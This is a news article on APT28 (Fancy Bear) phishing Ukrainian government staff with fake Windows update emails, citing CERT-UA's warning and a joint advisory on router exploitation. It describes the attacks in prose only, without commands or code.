Russian state-sponsored cybercriminal gang APT28, also known as Fancy Bear, has been targeting Ukrainian government organisations with malware hidden in fake Windows update emails. The phishing links are sent from Outlook email addresses that appear to be from employees of government organisations in Ukraine.
The Computer Emergency Response Team of Ukraine (CERT-UA) has released a warning concerning the attacks, explaining that they were carried out throughout April.
APT28 found attacking Ukrainian government
The emails would contain the subject line “Windows Update”, from email addresses created on the Outlook webmail service, but using real employee surnames and initials.
A sample letter described by CERT-UA contains instructions in Ukrainian for “updates to protect against hacker attacks,” as well as images of the process of launching a command line and executing a shell command.
“The mentioned command will download a PowerShell script that, simulating the process of updating the operating system, will download and execute a PowerShell script designed to collect basic information about the computer using the ‘tasklist’, ‘systeminfo’ commands,” the warning says.
CERT-UA recommends that any company feeling at risk from these attacks should restrict the ability of users to launch PowerShell/
APT28 is a well-established cybercriminal gang
The Russian cybercriminal gang APT28, otherwise called Fancy Bear, Pawn Storm, the Sednit Gang and Sofacy, has been tracked widely by security companies since 2014.
In recent months it has been aggressively targeting Ukraine, as well as organisations in the US and Europe via the exploitation of a vulnerability in Cisco routers.
A joint advisory by the UK National Cybersecurity Centre, the National Security Agency, the Cybersecurity and Infrastructure Agency and the Federal Bureau of Investigation announced last month that “APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742″.
The cybersecurity agencies added that they believe that APT28 is almost certainly part of the Russian security force, the GRU.
These are typical in the cyberattacks weathered by Ukraine during the war, explained Illia Vitiuk, the head of the Department of Cyber Information Security in the Security Service of Ukraine. during an interview last month with CyberScoop.
“More than 90% of all cyberattacks targeting Ukraine are either conducted by special services or by state-sponsored groups,” said Vitiuk. He went on to suggest that pro-Russian hacktivists were not as big a phenomenon as the cyber community has so far been led to believe.
“I believe that there is no so-called ‘hacktivism’ in Russia at all,” Vitiuk added.